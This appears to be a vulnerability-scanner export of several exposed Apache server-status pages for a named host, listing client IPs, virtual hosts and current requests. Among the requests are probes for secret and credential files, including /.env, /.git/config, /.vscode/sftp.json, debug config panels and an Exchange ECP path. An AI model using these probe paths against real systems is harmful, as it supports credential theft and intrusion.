5.8932547637090.00.10213.98 137.184.106.30http/1.1 3-949125930/26/7884_ 5.992038006630.00.18172.44 137.184.106.30http/1.1 4-949126780/124/9734_ 10.14761059624080.01.84270.98 198.41.233.16h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-949126780/123/9791_ 10.333075322470.01.70335.81 137.184.106.30h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-949126780/125/9752_ 10.410033047680.04.60219.15 137.184.106.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-949126780/128/9922_ 10.36052839674540.02.63269.74 172.70.134.112h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-949126780/127/10187_ 10.39021058821070.02.51259.32 172.70.38.2h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-949126780/128/9615_ 10.410060303440.02.17284.85 137.184.106.30http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-949126780/127/10082</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7552c12a266
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 11-Dec-2023 19:43:17 CET Restart Time: Wednesday, 06-Dec-2023 07:41:32 CET Parent Server Config. Generation: 30 Parent Server MPM Generation: 29 Server uptime: 5 days 12 hours 1 minute 44 seconds Server load: 0.00 0.02 0.00 Total accesses: 80892 - Total Traffic: 2.6 GB - Total Duration: 66620540 CPU Usage: u50.34 s39.98 cu546.04 cs464.86 - .232% CPU load .17 requests/sec - 5.7 kB/second - 33.5 kB/request - 823.574 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0294001no0yes010000 1293869no0yes010000 2293871no0yes010000 3293870no0yes19000 4293872no0yes010000 Sum500 149000 ____________________________________W_____________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-292940010/193/1667_ 16.977906407350.05.1345.64 17.22.237.88http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/274/1742_ 17.2373018683340.03.7449.32 172.70.42.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/381/1865_ 17.2231711851380.03.7856.48 159.203.94.228h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-292940010/358/1746_ 17.18793408301920.06.1841.43 172.70.82.125h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/320/1850_ 17.15793210193170.06.0343.81 51.178.207.154h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/254/1765_ 17.14681889156780.05.9583.26 172.70.135.186h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/280/1787_ 17.1568154878670.05.2671.03 172.71.114.92h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-292940010/196/1792_ 17.27006780140.03.2446.31 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-292940010/323/1791_ 16.963010361730.03.0362.68 159.203.94.228h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-292940010/227/1723_ 17.037913628466060.04.7074.17 94.156.64.120http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/75/1255_ 9.154703032430.01.4356.79 118.123.237.210http/1.1 1-292938690/88/1133_ 9.18002842680.00.9743.66 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-292938690/138/1117_ 9.15002879960.02.3150.85 118.123.237.210http/1.1relehse.com:80GET /login HTTP/1.1 1-292938690/84/1085_ 9.171024154630.01.2346.82 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-292938690/59/1088_ 9.1648212596800.00.7833.67 118.123.237.210http/1.1relehse.com:443GET /login HTTP/1.1 1-292938690/125/1339_ 9.00471013108498060.01.9854.98 118.123.237.210http/1.1 1-292938690/85/1071_ 9.05402274330.02.0423.90 172.71.114.159h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-292938690/75/1097_ 9.18104561450.01.9530.06 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-292938690/67/1116_ 9.17412652490.02.0421.93 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-292938690/72/1084_ 9.0623442546760.01.7824.39 159.203.94.228http/1.1 2-292938710/26/1327_ 7.6058506147740.00.8131.46 162.158.158.242h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/35/1308_ 7.72226020596050.00.7023.76 172.68.134.88h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/25/1323_ 7.0958516422243300.01.7329.53 172.70.174.130h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/29/1288_ 6.9658007264730.012.1148.24 172.68.230.138h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/20/1339_ 6.9822603201870.00.5745.20 172.71.175.29h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/31/1245_ 6.9822105838500.00.9141.67 172.71.175.29h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/32/1311_ 7.3922097334310.01.8240.70 159.203.94.228http/1.1 2-292938710/31/1290_ 6.69207071430.00.7971.49 159.203.94.228h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-292938710/32/1225_ 7.5022195713400860.01.5567.25 172.70.250.235h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-292938710/26/1195_ 6.48580020353310.00.7539.21 172.71.166.98h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/416/1476_ 18.253011570640.010.6673.07 159.203.94.228http/1.1 3-292938700/372/1584_ 18.20237010810760.04.8452.16 188.114.111.150h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/370/1525_ 18.341010348120.03.8451.62 188.114.111.13h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/561/1739_ 19.05119556890.06.9633.46 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-292938700/376/1602_ 18.9824360715805210.04.7332.03 172.69.6.240h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/403/1539_ 18.75337119074770.05.6128.44 159.203.94.228http/1.1 3-292938700/535/1792W 18.570011240430.05.3854.17 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-292938700/440/1565_ 18.6757509913630.06.4430.08 172.64.236.91h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-292938700/303/1381_ 18.642020086380.04.1741.70 159.203.94.228h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-292938700/484/1639_ 18.6423818881260.05.5734.52 141.101.100.197h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/127/2309_ 8.681037012749130.01.4466.50 172.64.236.110h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/50/2265_ 8.20108419937099840.015.0997.25 172.70.255.27h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/48/2504_ 9.06009997560.01.0057.27 159.203.94.228http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-292938720/57/2243_ 8.64103208389650.01.5157.83 141.101.100.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/44/2444_ 8.19050720038120.01.3399.19 172.70.254.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/40/2234_ 8.641084013176930.00.9054.91 141.101.100.152h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-292938720/42/2195_ 8.14209301840.00.7078.72 159.203.94.228http/1.1 4-292938720/47/225
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755ed8b2a3c
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 17-Nov-2023 02:31:49 CET Restart Time: Saturday, 04-Nov-2023 04:38:38 CET Parent Server Config. Generation: 89 Parent Server MPM Generation: 88 Server uptime: 12 days 21 hours 53 minutes 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 323349 - Total Traffic: 7.1 GB - Total Duration: 193774846 CPU Usage: u58.88 s69.55 cu1873.42 cs1382.21 - .303% CPU load .29 requests/sec - 6.7 kB/second - 23.1 kB/request - 599.275 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0613358no0yes19000 1613226no0yes010000 2613228no0yes010000 3613227no0yes010000 4613229no0yes010000 Sum500 149000 __W_______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-886133580/158/6545_ 13.93133024557260.03.32156.52 162.158.186.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-886133580/156/5789_ 13.9413930425938030.04.86137.73 162.158.186.202h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-886133580/138/6196W 13.910032104170.05.37154.07 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-886133580/148/6061_ 13.7513939434384100.03.96163.83 172.70.254.100h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-886133580/126/6240_ 13.8812825173650.02.49133.95 165.232.76.155h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-886133580/132/5991_ 13.931036847920.02.68148.65 165.232.76.155h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-886133580/147/6214_ 13.8413927885362340.04.13134.95 172.64.238.125h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-886133580/135/5964_ 13.84065426309760.05.07159.98 165.232.76.155h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-886133580/158/5935_ 13.75134033116000.07.39147.47 172.70.254.202h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-886133580/130/5518_ 13.980025545260.02.43138.69 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-886132260/20/5954_ 8.41605014583520.00.57126.01 108.162.212.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/16/5867_ 7.63609018710700.00.03113.12 162.158.79.169h2lcftech.es:443done, streams: 0/1/1/0/1 (open/recv/resp/push/rst) 1-886132260/21/6346_ 6.82605029027290.00.43133.08 172.70.181.131h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/19/6188_ 7.89600149607200.00.36131.75 172.70.134.18h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/22/5870_ 7.83139014451470.00.56120.39 172.70.175.58h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/17/6139_ 8.1560914758233510.00.50131.43 185.196.10.51h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/18/6234_ 8.41599023820340.01.41136.56 162.158.90.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/25/6292_ 8.56145019592040.00.76113.13 162.158.187.14h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/22/6148_ 7.87140020901400.00.37144.33 172.70.135.66h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-886132260/22/6042_ 6.83145019477390.00.20119.55 172.70.181.131h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-886132280/30/7765_ 9.000063915320.00.57129.13 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-886132280/26/7542_ 9.0017037519300.00.61169.40 40.77.188.35h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/19/7348_ 8.35140038723760.00.53179.62 172.71.22.16h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/27/7482_ 8.15139076680010.00.14158.56 172.70.134.36h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/21/7259_ 8.941440157185440.01.09164.12 162.158.186.163h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/27/7471_ 8.93139071664280.01.00166.10 162.158.186.14h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/27/7230_ 8.93140031622330.00.18130.92 162.158.186.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/21/7262_ 8.74140044702310.00.95147.14 162.158.90.112h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/16/7786_ 8.73140040763870.00.40170.64 162.158.91.55h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-886132280/20/6992_ 8.7613912944195690.00.56176.21 92.221.105.169http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/30/6266_ 9.150040403000.00.46141.31 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-886132270/31/6593_ 8.020039512350.00.66140.14 172.69.64.234h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/21/6121_ 8.09145040358830.00.33147.40 108.162.210.205h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/32/6346_ 9.160027240690.00.75138.57 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-886132270/31/6357_ 9.07026731330010.02.00130.37 162.158.186.170h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/26/6496_ 9.150043155240.00.94163.16 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-886132270/28/6352_ 8.691405741510810.00.15155.76 213.152.186.168h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/30/6007_ 8.63023839417490.01.72152.99 198.41.242.192h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/30/6109_ 8.10140043610340.00.54152.43 108.162.210.176h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-886132270/27/6781_ 9.150224787960.00.22183.14 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-886132290/104/6366_ 13.21169658731980.02.74183.25 165.232.76.155h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-886132290/96/6728_ 13.341225811660.010.49138.35 165.232.76.155http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-886132290/97/6289_ 13.320060642890.02.48136.28 165.232.76.155http/1.1 4-886132290/107/6305_ 13.0217123067890.02.58124.16 165.232.76.155h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-886132290/110/6489_ 13.3316120821800.01.95142.81 40.77.189.254h2barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-886132290/135/6311_ 13.320037371010.03.03137.67 165.232.76
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c75519d6eacf
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 10-Nov-2023 07:38:56 CET Restart Time: Saturday, 04-Nov-2023 04:38:38 CET Parent Server Config. Generation: 40 Parent Server MPM Generation: 39 Server uptime: 6 days 3 hours 17 seconds Server load: 0.26 0.12 0.04 Total accesses: 133279 - Total Traffic: 2.8 GB - Total Duration: 78536870 CPU Usage: u13.7 s20.63 cu819.06 cs628.28 - .28% CPU load .252 requests/sec - 5.6 kB/second - 22.3 kB/request - 589.267 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0311826no0yes010000 1311957no0yes010000 2311828no0yes19000 3311825no0yes010000 4311827no0yes010000 Sum500 149000 _________________________W________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-393118260/2/1945_ 0.03003773480.00.0249.36 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-393118260/0/1777_ 0.00013579010.00.0044.90 139.144.150.8http/1.1 0-393118260/1/2209_ 0.02013726000.00.0151.99 139.144.150.23http/1.1 0-393118260/1/1656_ 0.04003904280.00.0042.19 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-393118260/0/2004_ 0.00003851060.00.0050.65 139.144.150.23http/1.1 0-393118260/2/1894_ 0.03003763030.00.0053.33 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-393118260/2/2028_ 0.020365429780.00.0243.46 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-393118260/2/1807_ 0.03007344430.00.0239.28 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-393118260/1/1990_ 0.01004083140.00.0040.11 172.70.175.4h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-393118260/0/1674_ 0.00004259300.00.0059.83 139.144.150.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-393119570/3/2614_ 0.04006077830.00.0152.83 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-393119570/2/2817_ 0.04029205180.00.0355.52 139.144.150.8http/1.1 1-393119570/3/2992_ 0.040020284070.00.0169.40 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-393119570/3/2781_ 0.040028806360.00.0048.44 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 1-393119570/0/2889_ 0.00005925910.00.0054.61 139.144.150.23http/1.1 1-393119570/1/2903_ 0.020318341760.00.0355.82 172.70.174.180h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-393119570/2/2850_ 0.040015125630.00.0065.16 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-393119570/3/3057_ 0.04008761070.00.0043.63 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.env HTTP/1.1 1-393119570/1/2762_ 0.040012968290.00.0056.23 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-393119570/2/2791_ 0.040110576740.00.0247.83 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-393118280/1/3124_ 0.01008303270.00.0153.75 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-393118280/1/3037_ 0.00008164150.00.0065.87 172.70.175.232h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-393118280/1/3135_ 0.01007860950.00.0566.44 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-393118280/1/3185_ 0.010049836050.00.0268.16 139.144.150.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-393118280/2/3138_ 0.030050822120.00.0287.51 134.122.34.144http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-393118280/0/3277W 0.00008213450.00.0066.10 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-393118280/2/3040_ 0.02008973200.00.0354.60 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-393118280/2/2842_ 0.03009945190.00.0662.58 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.DS_Store HTTP/1.1 2-393118280/1/3323_ 0.01008199080.00.0269.48 172.70.175.186h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-393118280/2/2888_ 0.03008262980.00.0384.86 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-393118250/1/2256_ 0.000014038470.00.0246.87 172.70.175.119h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-393118250/1/2575_ 0.00092818203140.00.0365.42 139.144.150.8http/1.1 3-393118250/2/2154_ 0.020011811180.00.0048.33 139.144.150.23http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-393118250/2/2274_ 0.03008671840.00.0056.73 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-393118250/2/2178_ 0.020017990430.00.0158.27 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-393118250/1/2322_ 0.020023604050.00.0064.18 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 3-393118250/0/2288_ 0.00092226404720.00.0078.45 172.70.92.215h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-393118250/1/2166_ 0.020022840450.00.0050.31 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-393118250/0/2144_ 0.00013316043770.00.0056.55 184.168.113.205http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 3-393118250/0/2223_ 0.000011159170.00.0042.08 139.144.150.8h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-393118270/1/3076_ 0.030013420880.00.0068.23 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.git/config HTTP/1.1 4-393118270/1/3328_ 0.030011579970.00.0167.65 139.144.150.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-393118270/0/3296_ 0.00017751278250.00.0066.44 172.70.38.39h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-393118270/1/3174_ 0.030014019980.00.0055.90 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-393118270/2/3211_ 0.020012112720.00.0079.07 64.227.126.135http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-393118270/1/3175_ 0.000029639550.00.0050.18 139.144.150.23http/1.1 4-393118270/0/2901_ 0.00094116911810.00.0053.57 139.144.150.8http/1.1 4-393118270/1/3458_ 0.010031280120.00.0264.76 139.144.150.23h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-393118
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c75597490df2
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 23-Sep-2023 07:31:48 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 22 Parent Server MPM Generation: 21 Server uptime: 15 days 19 hours 41 minutes 45 seconds Server load: 0.05 0.06 0.07 Total accesses: 883077 - Total Traffic: 20.6 GB - Total Duration: 268805769 CPU Usage: u249.43 s243.87 cu2617.4 cs2422.87 - .405% CPU load .646 requests/sec - 15.8 kB/second - 24.5 kB/request - 304.397 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0727175no3yes010000 1654142no2yes010000 2654143no6yes010000 3654141no2yes010000 4745202no1yes19000 Sum5014 149000 _________________________________________________W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-217271750/1242/12709_ 65.1026030387430.025.18268.72 172.70.182.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1310/12413_ 65.1026934909990.018.58293.31 172.70.182.133h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-217271750/1610/13463_ 65.1026137868510.022.27299.30 172.70.182.133h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1602/12819_ 65.0927158157190.027.71319.16 172.70.182.155h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-217271750/1273/12035_ 65.1127052669590.020.50297.75 172.70.182.151h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 0-217271750/1606/11928_ 65.09271449792500.022.75295.76 172.70.182.138h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1321/12373_ 65.0926082137170.035.30325.24 172.70.182.151h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-217271750/1214/11892_ 65.1126056437060.021.75280.43 172.70.182.145h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-217271750/1327/11974_ 65.1127155190350.027.87322.42 172.70.182.152h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-217271750/1309/11950_ 65.1127063326210.020.09248.76 172.70.182.148h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-216541420/886/19440_ 103.7226044880030.015.70498.44 172.70.182.144h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-216541420/1079/19735_ 103.7226065190390.033.53456.03 172.70.182.144h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-216541420/1114/20121_ 103.72280134822500.014.04478.23 172.70.182.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/865/19684_ 103.7226039746430.021.18447.73 172.70.182.138h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-216541420/802/19517_ 103.7326055300390.015.97475.37 172.70.182.143h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/880/20394_ 103.5826078588530.017.75416.37 172.71.131.137h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-216541420/891/20280_ 103.7326033139660.014.61498.91 172.70.182.160h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/1135/20524_ 103.142622114315100.024.33481.23 